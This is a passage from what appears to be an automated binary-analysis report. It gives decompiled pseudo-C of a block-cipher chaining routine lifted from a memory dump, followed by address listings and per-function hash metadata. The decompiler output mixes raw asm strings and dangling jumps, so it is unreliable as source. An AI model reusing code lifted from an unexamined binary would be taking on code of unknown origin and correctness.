					 *(_t498 + 0x30) = _t440;
					_t390 = _t440;
					_t441 = _t249;
					__eflags = _t361[5];
					if(__eflags == 0) {
						asm("bt dword [esp+0x34], 0x19");
						if(__eflags >= 0) {
							while(1) {
								_t289 =  *(_t441 + 4);
								_t321 =  *(_t441 + 8);
								_t363 =  *(_t441 + 0xc);
								_t391 = _t498 + 0x3c;
								 *_t391 =  *_t441;
								 *(_t391 + 4) = _t289;
								 *(_t391 + 8) = _t321;
								 *(_t391 + 0xc) = _t363;
								_t251 = E00B9F830( *_t441, _t289, _t321, _t363,  *((intOrPtr*)(_t498 + 0x2c)));
								_t393 =  *(_t498 + 0x30);
								_t252 = _t251 ^  *_t393;
								_t290 = _t289 ^ _t393[1];
								_t322 = _t321 ^ _t393[2];
								_t364 = _t363 ^ _t393[3];
								_t443 =  *(_t498 + 0x28) - 0x10;
								__eflags = _t443;
								if(__eflags < 0) {
									break;
								}
								 *(_t498 + 0x28) = _t443;
								_t448 =  *(_t498 + 0x24);
								 *_t448 = _t252;
								 *(_t448 + 4) = _t290;
								 *(_t448 + 8) = _t322;
								 *(_t448 + 0xc) = _t364;
								 *(_t498 + 0x24) = _t448 + 0x10;
								_t450 = _t498 + 0x3c;
								_t255 =  *_t450;
								 *_t393 = _t255;
								_t393[1] = _t450[1];
								_t393[2] = _t450[2];
								_t393[3] = _t450[3];
								_t441 =  *(_t498 + 0x20) + 0x10;
								 *(_t498 + 0x20) = _t441;
								if(__eflags != 0) {
									continue;
								} else {
									asm("popfd");
									return _t255;
								}
								goto L54;
							}
							_t444 = _t498 + 0x3c;
							 *_t444 = _t252;
							_t444[1] = _t290;
							_t444[2] = _t322;
							_t444[3] = _t364;
							_t445 =  *(_t498 + 0x20);
							 *_t393 =  *_t445;
							_t393[1] =  *(_t445 + 4);
							_t393[2] =  *(_t445 + 8);
							_t393[3] =  *(_t445 + 0xc);
							_t254 = memcpy( *(_t498 + 0x24), _t498 + 0x3c,  *(_t498 + 0x28));
							asm("popfd");
							return _t254;
						} else {
							while(1) {
								asm("movq mm0, [esi]");
								asm("movq mm4, [esi+0x8]");
								E00B9FCB0( *((intOrPtr*)(_t498 + 0x2c)));
								_t453 =  *(_t498 + 0x20);
								_t257 = _t498 + 0x3c;
								_t295 =  *(_t498 + 0x24);
								asm("movq mm1, [esi]");
								asm("movq mm5, [esi+0x8]");
								asm("pxor mm0, [edi]");
								asm("pxor mm4, [edi+0x8]");
								asm("movq [edi], mm1");
								asm("movq [edi+0x8], mm5");
								_t328 =  *(_t498 + 0x28) - 0x10;
								__eflags = _t328;
								if(__eflags < 0) {
									break;
								}
								asm("movq [ebx], mm0");
								asm("movq [ebx+0x8], mm4");
								 *(_t498 + 0x24) = _t295 + 0x10;
								 *(_t498 + 0x20) = _t453 + 0x10;
								 *(_t498 + 0x28) = _t328;
								if(__eflags != 0) {
									continue;
								} else {
									asm("emms");
									asm("popfd");
									return _t257;
								}
								goto L54;
							}
							asm("movq [eax], mm0");
							asm("movq [eax+0x8], mm4");
							asm("emms");
							_t329 = _t328 + 0x10;
							__eflags = _t329;
							_t258 = memcpy(_t295, _t257, _t329);
							asm("popfd");
							return _t258;
						}
					} else {
						__eflags = _t320 - 0x10;
						_t367 = _t288;
						if(__eflags < 0) {
							L41:
							asm("emms");
							_t406 = _t367;
							_t300 = 0x10 - _t320;
							__eflags = _t406 - _t441;
							if(_t406 == _t441) {
								_t407 = _t406 + _t320;
							} else {
								memcpy(_t406, _t441, _t320);
								_t498 = _t498 + 0xc;
								_t407 = _t441 + _t320 + _t320;
							}
							memset(_t407, 0, _t300 << 0);
							_t498 = _t498 + 0xc;
							_t390 =  *(_t498 + 0x30);
							_t441 = _t367;
							_t261 =  *_t390;
							_t301 =  *(_t390 + 4);
							 *(_t498 + 0x28) = 0x10;
							goto L38;
						} else {
							asm("bt dword [esp+0x34], 0x19");
							if(__eflags >= 0) {
								_t261 =  *_t390;
								_t301 =  *(_t390 + 4);
								do {
									L38:
									_t301 = _t301 ^  *(_t441 + 4);
									_t334 =  *(_t390 + 8) ^  *(_t441 + 8);
									_t369 =  *(_t390 + 0xc) ^  *(_t441 + 0xc);
									_t261 = E00B9E380(_t261 ^  *_t441, _t301, _t334, _t369,  *((intOrPtr*)(_t498 + 0x2c)));
									_t390 =  *(_t498 + 0x24);
									 *_t390 = _t261;
									 *(_t390 + 4) = _t301;
									 *(_t390 + 8) = _t334;
									 *(_t390 + 0xc) = _t369;
									_t441 =  *(_t498 + 0x20) + 0x10;
									 *(_t498 + 0x20) = _t441;
									_t367 = _t390 + 0x10;
									 *(_t498 + 0x24) = _t367;
									_t320 =  *(_t498 + 0x28) - 0x10;
									__eflags = _t320 - 0x10;
									 *(_t498 + 0x28) = _t320;
								} while (_t320 >= 0x10);
								__eflags = _t320 & 0x0000000f;
								if((_t320 & 0x0000000f) != 0) {
									goto L41;
								}
								_t459 =  *(_t498 + 0x30);
								 *_t459 = _t261;
								 *(_t459 + 4) = _t301;
								 *(_t459 + 8) =  *(_t390 + 8);
								 *(_t459 + 0xc) =  *(_t390 + 0xc);
								asm("popfd");
								return _t261;
							} else {
								asm("movq mm0, [edi]");
								asm("movq mm4, [edi+0x8]");
								0;
								0;
								do {
									asm("pxor mm0, [esi]");
									asm("pxor mm4, [esi+0x8]");
									_t264 = E00B9E6E0( *((intOrPtr*)(_t498 + 0x2c)));
									asm("movq [edi], mm0");
									asm("movq [edi+0x8], mm4");
									_t441 =  *(_t498 + 0x20) + 0x10;
									 *(_t498 + 0x20) = _t441;
									_t367 =  *(_t498 + 0x24) + 0x10;
									 *(_t498 + 0x24) = _t367;
									_t320 =  *(_t498 + 0x28) - 0x10;
									__eflags = _t320 - 0x10;
									 *(_t498 + 0x28) = _t320;
								} while (_t320 >= 0x10);
								__eflags = _t320 & 0x0000000f;
								if((_t320 & 0x0000000f) != 0) {
									goto L41;
								} else {
									asm("movq [esi], mm0");
									asm("movq [esi+0x8], mm4");
									asm("emms");
									asm("popfd");
									return _t264;
								}
							}
						}
					}
				} else {
					_t513 = _t320 & 0x0000000f;
					if(_t513 != 0) {
						goto L30;
					} else {
						asm("bt dword [eax], 0x1c");
						if(_t513 < 0) {
							goto L30;
						} else {
							_t465 = _t496 - 0x00000144 & 0xffffffc0;
							_t7 = _t485 + 0x900; // 0xa5636cc6
							_t266 = _t485 & 0x00000fff;
							_t305 = _t7 & 0x00000fff;
							_t372 = _t465 & 0x00000fff;
							if(_t372 < _t305) {
								_t466 = _t465 - (_t372 - _t266 & 0x00000fff) + 0x180;
								__eflags = _t466;
							} else {
								_t466 = _t465 - _t372 - _t305;
							}
							_t376 = _t496 + 0x18;
							_t508 = _t466 + 4;
							 *(_t508 + 0x18) = _t485;
							 *((intOrPtr*)(_t508 + 0x1c)) = _t496;
							_t415 = _t376[3];
							_t377 = _t376[5];
							 *(_t508 + 0x20) =  *_t376;
							 *(_t508 + 0x24) = _t376[1];
							 *(_t508 + 0x28) = _t320;
							 *(_t508 + 0x2c) = _t415;
							 *(_t508 + 0x30) = _t376[4];
							 *(_t508 + 0x13c) = 0;
							_t469 = _t415;
							_t309 = _t415 - _t485 & 0x00000fff;
							_t416 = _t508 + 0x4c;
							if(_t309 < 0x900) {
								L11:
								 *(_t508 + 0x2c) = _t416;
								memcpy(_t416, _t469, 0x3d << 2);
								_t508 = _t508 + 0xc;
							} else {
								if(_t309 >= 0xf0c) {
									goto L11;
								}
							}
							_t419 = 0x10;
							do {
								_t485 = _t485 + 0x80;
								_t419 = _t419 - 1;
							} while (_t419 != 0);
							_t493 = _t485 - 0x800;
							_t471 =  *(_t508 + 0x20);
							_t420 =  *(_t508 + 0x30);
							if(_t377 == 0) {
								__eflags = _t471 -  *(_t508 + 0x24);
								if(_t471 ==  *(_t508 + 0x24)) {
									do {
										_t311 = _t471[1];
										_t342 = _t471[2];
										_t378 = _t471[3];
										_t421 = _t508 + 0x3c;
										 *_t421 =  *_t471;
										_t421[1] = _t311;
										_t421[2] = _t342;
										_t421[3] = _t378;
										_t271 = E00B9FF80( *_t471, _t311, _t342, _t378,  *(_t508 + 0x2c));
										_t423 =  *(_t508 + 0x30);
										_t472 =  *(_t508 + 0x24);
										 *_t472 = _t271 ^  *_t423;
										_t472[1] = _t311 ^ _t423[1];
										_t472[2] = _t342 ^ _t423[2];
										_t472[3] = _t378 ^ _t423[3];
										 *(_t508 + 0x24) =  &(_t472[4]);
										_t474 = _t508 + 0x3c;
										_t273 =  *_t474;
										 *_t423 = _t273;
										_t423[1] = _t474[1];
										_t423[2] = _t474[2];
										_t423[3] = _t474[3];
										_t471 =  &(( *(_t508 + 0x20))[4]);
										 *(_t508 + 0x20) = _t471;
										_t346 =  *(_t508 + 0x28) - 0x10;
										__eflags = _t346;
										 *(_t508 + 0x28) = _t346;
									} while (_t346 != 0);
								} else {
									 *(_t508 + 0x34) = _t420;
									do {
										_t315 = _t471[1];
										_t349 = _t471[2];
										_t381 = _t471[3];
										_t276 = E00B9FF80( *_t471, _t315, _t349, _t381,  *(_t508 + 0x2c));
										_t428 =  *(_t508 + 0x34);
										_t429 =  *(_t508 + 0x24);
										_t478 =  *(_t508 + 0x20);
										 *_t429 = _t276 ^  *_t428;
										_t429[1] = _t315 ^ _t428[1];
										_t429[2] = _t349 ^ _t428[2];
										_t429[3] = _t381 ^ _t428[3];
										 *(_t508 + 0x34) = _t478;
										_t471 =  &(_t478[4]);
										 *(_t508 + 0x20) = _t471;
										 *(_t508 + 0x24) =  &(_t429[4]);
										_t352 =  *(_t508 + 0x28) - 0x10;
										__eflags = _t352;
										 *(_t508 + 0x28) = _t352;
									} while (_t352 != 0);
									_t431 =  *(_t508 + 0x34);
									_t479 =  *(_t508 + 0x30);
									_t273 =  *_t431;
									 *_t479 = _t273;
									_t479[1] = _t431[1];
									_t479[2] = _t431[2];
									_t479[3] = _t431[3];
								}
								__eflags =  *(_t508 + 0x13c);
								_t424 =  *(_t508 + 0x2c);
								if( *(_t508 + 0x13c) != 0) {
									__eflags = 0;
									_t273 = memset(_t424, 0, 0x3c << 2);
									_t508 = _t508 + 0xc;
								}
								asm("popfd");
								return _t273;
							} else {
								_t278 =  *_t420;
								_t318 = _t420[1];
								0;
								0;
								do {
									_t318 = _t318 ^ _t471[1];
									_t355 = _t420[2] ^ _t471[2];
									_t385 = _t420[3] ^ _t471[3];
									_t278 = E00B9E8F0(_t278 ^  *_t471, _t318, _t355, _t385,  *(_t508 + 0x2c), _t493);
									_t420 =  *(_t508 + 0x24);
									 *_t420 = _t278;
									_t420[1] = _t318;
									_t420[2] = _t355;
									_t420[3] = _t385;
									_t471 =  &(( *(_t508 + 0x20))[4]);
									 *(_t508 + 0x20) = _t471;
									 *(_t508 + 0x24) =  &(_t420[4]);
									_t357 =  *(_t508 + 0x28) - 0x10;
									 *(_t508 + 0x28) = _t357;
								} while (_t357 != 0);
								_t481 =  *(_t508 + 0x30);
								 *_t481 = _t278;
								_t481[1] = _t318;
								_t481[2] = _t420[2];
								_t481[3] = _t420[3];
								_t433 =  *(_t508 + 0x2c);
								if( *(_t508 + 0x13c) != 0) {
									_t278 = memset(_t433, 0, 0x3c << 2);
									_t508 = _t508 + 0xc;
								}
								asm("popfd");
								return _t278;
							}
						}
					}
				}
				L54:
			}






























































































                                                              0x00ba0e86
                                                              0x00ba0e86
                                                              0x00ba0e92
                                                              0x00ba0e92
                                                              0x00ba0e98
                                                              0x00ba0e9e
                                                              0x00ba0e9e
                                                              0x00ba0ea4
                                                              0x00ba0ea5
                                                              0x00ba0eac
                                                              0x00ba11a0
                                                              0x00ba11a2
                                                              0x00ba11bd
                                                              0x00ba11d4
                                                              0x00ba11da
                                                              0x00ba11dd
                                                              0x00ba11e1
                                                              0x00ba11e5
                                                              0x00ba11e9
                                                              0x00ba11eb
                                                              0x00ba11ee
                                                              0x00ba11f4
                                                              0x00ba11f8
                                                              0x00ba11fc
                                                              0x00ba1200
                                                              0x00ba1204
                                                              0x00ba1208
                                                              0x00ba120a
                                                              0x00ba120c
                                                              0x00ba120f
                                                              0x00ba1380
                                                              0x00ba1386
                                                              0x00ba1420
                                                              0x00ba1422
                                                              0x00ba1425
                                                              0x00ba1428
                                                              0x00ba142b
                                                              0x00ba142f
                                                              0x00ba1431
                                                              0x00ba1434
                                                              0x00ba1437
                                                              0x00ba143e
                                                              0x00ba1443
                                                              0x00ba144b
                                                              0x00ba144d
                                                              0x00ba1450
                                                              0x00ba1453
                                                              0x00ba1456
                                                              0x00ba1456
                                                              0x00ba1459
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba145f
                                                              0x00ba1463
                                                              0x00ba1467
                                                              0x00ba1469
                                                              0x00ba146c
                                                              0x00ba146f
                                                              0x00ba1475
                                                              0x00ba1479
                                                              0x00ba147d
                                                              0x00ba1488
                                                              0x00ba148a
                                                              0x00ba148d
                                                              0x00ba1490
                                                              0x00ba1497
                                                              0x00ba149a
                                                              0x00ba149e
                                                              0x00000000
                                                              0x00ba14a4
                                                              0x00ba14a8
                                                              0x00ba14ad
                                                              0x00ba14ad
                                                              0x00000000
                                                              0x00ba149e
                                                              0x00ba14b0
                                                              0x00ba14b4
                                                              0x00ba14b6
                                                              0x00ba14b9
                                                              0x00ba14bc
                                                              0x00ba14bf
                                                              0x00ba14ce
                                                              0x00ba14d0
                                                              0x00ba14d3
                                                              0x00ba14d6
                                                              0x00ba14ea
                                                              0x00ba14f0
                                                              0x00ba14f5
                                                              0x00ba138c
                                                              0x00ba138c
                                                              0x00ba138c
                                                              0x00ba138f
                                                              0x00ba1397
                                                              0x00ba139c
                                                              0x00ba13a0
                                                              0x00ba13a4
                                                              0x00ba13b0
                                                              0x00ba13b3
                                                              0x00ba13b7
                                                              0x00ba13ba
                                                              0x00ba13be
                                                              0x00ba13c1
                                                              0x00ba13c5
                                                              0x00ba13c5
                                                              0x00ba13c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba13ce
                                                              0x00ba13d1
                                                              0x00ba13d8
                                                              0x00ba13df
                                                              0x00ba13e3
                                                              0x00ba13e7
                                                              0x00000000
                                                              0x00ba13ed
                                                              0x00ba13ed
                                                              0x00ba13f3
                                                              0x00ba13f8
                                                              0x00ba13f8
                                                              0x00000000
                                                              0x00ba13e7
                                                              0x00ba1400
                                                              0x00ba1403
                                                              0x00ba1407
                                                              0x00ba1409
                                                              0x00ba1409
                                                              0x00ba1412
                                                              0x00ba1418
                                                              0x00ba141d
                                                              0x00ba141d
                                                              0x00ba1215
                                                              0x00ba1215
                                                              0x00ba1218
                                                              0x00ba121a
                                                              0x00ba1340
                                                              0x00ba1340
                                                              0x00ba1342
                                                              0x00ba1349
                                                              0x00ba134b
                                                              0x00ba134d
                                                              0x00ba135d
                                                              0x00ba1356
                                                              0x00ba1356
                                                              0x00ba1356
                                                              0x00ba1356
                                                              0x00ba1356
                                                              0x00ba1366
                                                              0x00ba1366
                                                              0x00ba1368
                                                              0x00ba136c
                                                              0x00ba136e
                                                              0x00ba1370
                                                              0x00ba1373
                                                              0x00000000
                                                              0x00ba1220
                                                              0x00ba1220
                                                              0x00ba1226
                                                              0x00ba12b0
                                                              0x00ba12b2
                                                              0x00ba12b8
                                                              0x00ba12b8
                                                              0x00ba12c0
                                                              0x00ba12c3
                                                              0x00ba12c6
                                                              0x00ba12cd
                                                              0x00ba12d6
                                                              0x00ba12da
                                                              0x00ba12dc
                                                              0x00ba12df
                                                              0x00ba12e2
                                                              0x00ba12e9
                                                              0x00ba12ec
                                                              0x00ba12f0
                                                              0x00ba12f3
                                                              0x00ba12f7
                                                              0x00ba12fa
                                                              0x00ba12fd
                                                              0x00ba12fd
                                                              0x00ba1307
                                                              0x00ba130d
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba1313
                                                              0x00ba131d
                                                              0x00ba131f
                                                              0x00ba1322
                                                              0x00ba1325
                                                              0x00ba132c
                                                              0x00ba1331
                                                              0x00ba122c
                                                              0x00ba122c
                                                              0x00ba122f
                                                              0x00ba1239
                                                              0x00ba123d
                                                              0x00ba1240
                                                              0x00ba1240
                                                              0x00ba1243
                                                              0x00ba124b
                                                              0x00ba125c
                                                              0x00ba125f
                                                              0x00ba1263
                                                              0x00ba1266
                                                              0x00ba126a
                                                              0x00ba126d
                                                              0x00ba1271
                                                              0x00ba1274
                                                              0x00ba1277
                                                              0x00ba1277
                                                              0x00ba1281
                                                              0x00ba1287
                                                              0x00000000
                                                              0x00ba128d
                                                              0x00ba1291
                                                              0x00ba1294
                                                              0x00ba1298
                                                              0x00ba129e
                                                              0x00ba12a3
                                                              0x00ba12a3
                                                              0x00ba1287
                                                              0x00ba1226
                                                              0x00ba121a
                                                              0x00ba0eb2
                                                              0x00ba0eb2
                                                              0x00ba0eb8
                                                              0x00000000
                                                              0x00ba0ebe
                                                              0x00ba0ebe
                                                              0x00ba0ec2
                                                              0x00000000
                                                              0x00ba0ec8
                                                              0x00ba0ecf
                                                              0x00ba0ed4
                                                              0x00ba0edc
                                                              0x00ba0ee1
                                                              0x00ba0ee7
                                                              0x00ba0eef
                                                              0x00ba0f0e
                                                              0x00ba0f0e
                                                              0x00ba0ef5
                                                              0x00ba0ef7
                                                              0x00ba0ef7
                                                              0x00ba0f10
                                                              0x00ba0f16
                                                              0x00ba0f19
                                                              0x00ba0f1d
                                                              0x00ba0f26
                                                              0x00ba0f2c
                                                              0x00ba0f2f
                                                              0x00ba0f33
                                                              0x00ba0f37
                                                              0x00ba0f3b
                                                              0x00ba0f3f
                                                              0x00ba0f43
                                                              0x00ba0f57
                                                              0x00ba0f59
                                                              0x00ba0f5f
                                                              0x00ba0f69
                                                              0x00ba0f7c
                                                              0x00ba0f7c
                                                              0x00ba0f82
                                                              0x00ba0f82
                                                              0x00ba0f6f
                                                              0x00ba0f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba0f75
                                                              0x00ba0f84
                                                              0x00ba0f8c
                                                              0x00ba0f98
                                                              0x00ba0f9e
                                                              0x00ba0f9e
                                                              0x00ba0fa7
                                                              0x00ba0fad
                                                              0x00ba0fb1
                                                              0x00ba0fb8
                                                              0x00ba1060
                                                              0x00ba1064
                                                              0x00ba10f0
                                                              0x00ba10f2
                                                              0x00ba10f5
                                                              0x00ba10f8
                                                              0x00ba10fb
                                                              0x00ba10ff
                                                              0x00ba1101
                                                              0x00ba1104
                                                              0x00ba1107
                                                              0x00ba110e
                                                              0x00ba1113
                                                              0x00ba1117
                                                              0x00ba1126
                                                              0x00ba1128
                                                              0x00ba112b
                                                              0x00ba112e
                                                              0x00ba1134
                                                              0x00ba1138
                                                              0x00ba113c
                                                              0x00ba1147
                                                              0x00ba1149
                                                              0x00ba114c
                                                              0x00ba114f
                                                              0x00ba115a
                                                              0x00ba115d
                                                              0x00ba1161
                                                              0x00ba1161
                                                              0x00ba1164
                                                              0x00ba1164
                                                              0x00ba106a
                                                              0x00ba106a
                                                              0x00ba1070
                                                              0x00ba1072
                                                              0x00ba1075
                                                              0x00ba1078
                                                              0x00ba107f
                                                              0x00ba1084
                                                              0x00ba1097
                                                              0x00ba109b
                                                              0x00ba109f
                                                              0x00ba10a1
                                                              0x00ba10a4
                                                              0x00ba10a7
                                                              0x00ba10ae
                                                              0x00ba10b2
                                                              0x00ba10b5
                                                              0x00ba10bc
                                                              0x00ba10c0
                                                              0x00ba10c0
                                                              0x00ba10c3
                                                              0x00ba10c3
                                                              0x00ba10cd
                                                              0x00ba10d1
                                                              0x00ba10d5
                                                              0x00ba10e0
                                                              0x00ba10e2
                                                              0x00ba10e5
                                                              0x00ba10e8
                                                              0x00ba10e8
                                                              0x00ba1170
                                                              0x00ba1178
                                                              0x00ba117c
                                                              0x00ba1187
                                                              0x00ba118e
                                                              0x00ba118e
                                                              0x00ba118e
                                                              0x00ba1194
                                                              0x00ba1199
                                                              0x00ba0fbe
                                                              0x00ba0fbe
                                                              0x00ba0fc0
                                                              0x00ba0fc9
                                                              0x00ba0fcd
                                                              0x00ba0fd0
                                                              0x00ba0fd8
                                                              0x00ba0fdb
                                                              0x00ba0fde
                                                              0x00ba0fe5
                                                              0x00ba0fee
                                                              0x00ba0ff2
                                                              0x00ba0ff4
                                                              0x00ba0ff7
                                                              0x00ba0ffa
                                                              0x00ba0ffd
                                                              0x00ba1004
                                                              0x00ba100b
                                                              0x00ba100f
                                                              0x00ba1012
                                                              0x00ba1012
                                                              0x00ba101c
                                                              0x00ba1026
                                                              0x00ba1028
                                                              0x00ba102b
                                                              0x00ba102e
                                                              0x00ba1039
                                                              0x00ba103d
                                                              0x00ba104e
                                                              0x00ba104e
                                                              0x00ba104e
                                                              0x00ba1054
                                                              0x00ba1059
                                                              0x00ba1059
                                                              0x00ba0fb8
                                                              0x00ba0ec2
                                                              0x00ba0eb8
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1df40e83eebdcc5c234546da4c4edb33c57b9559b3b1d56de9795af6dbb0e79
                                                              • Instruction ID: 164f58c889df694a67d3fcf3506d543f635fa4ee6829c3299f9269971a1e7934
                                                              • Opcode Fuzzy Hash: e1df40e83eebdcc5c234546da4c4edb33c57b9559b3b1d56de9795af6dbb0e79
                                                              • Instruction Fuzzy Hash: 6A22C076908B129FC754CF29D08055AF7E1FF89324F158A6EE9A9A3B10C730BA55CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BC9100, Relevance: .4, Instructions: 443COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                                                              • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                              • Opcode Fuzzy Hash: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                                                              • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9A8B0, Relevance: .4, Instructions: 374COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcf8165f92d58746db6ffb2313d7d0f646d31432b630f7e24032bf6c571f3fca
                                                              • Instruction ID: 67c2d12953c04ce1c5b20a45600b2b477edb8edda71b703bf6eaefe1e40b69a9
                                                              • Opcode Fuzzy Hash: fcf8165f92d58746db6ffb2313d7d0f646d31432b630f7e24032bf6c571f3fca
                                                              • Instruction Fuzzy Hash: 79024225C18FDA86E7129B3DC442977B7A0BFEA248F10DB1EFDD436511EB31A684E241
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9A230, Relevance: .4, Instructions: 374COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c22bcfaca740829001c9608f6768e92eee537ddf69eca220a62b7339dbf2fe25
                                                              • Instruction ID: c40451b9722e86d336282527c80f3273918cb54feda345876b7cea28716a1061
                                                              • Opcode Fuzzy Hash: c22bcfaca740829001c9608f6768e92eee537ddf69eca220a62b7339dbf2fe25
                                                              • Instruction Fuzzy Hash: 20027225C18FDA86E7129B3DC442677F7A0BFEA248F10DB1EFDD532911EB21A644E241
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B99C40, Relevance: .4, Instructions: 362COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70112ff4cfd3648cb52c69d271e6e278981b08f221d1e353d51558c74d483210
                                                              • Instruction ID: dbe71aeeadd51f2a7590fa2acb61780a6cc4af412bca940ed9982e5f378ce752
                                                              • Opcode Fuzzy Hash: 70112ff4cfd3648cb52c69d271e6e278981b08f221d1e353d51558c74d483210
                                                              • Instruction Fuzzy Hash: A3F17221C1DFDA87D6129B3A8542166F3A0BFFB284F14EB1AFDD435412EB61B2D59240
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9F830, Relevance: .4, Instructions: 357COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 60%
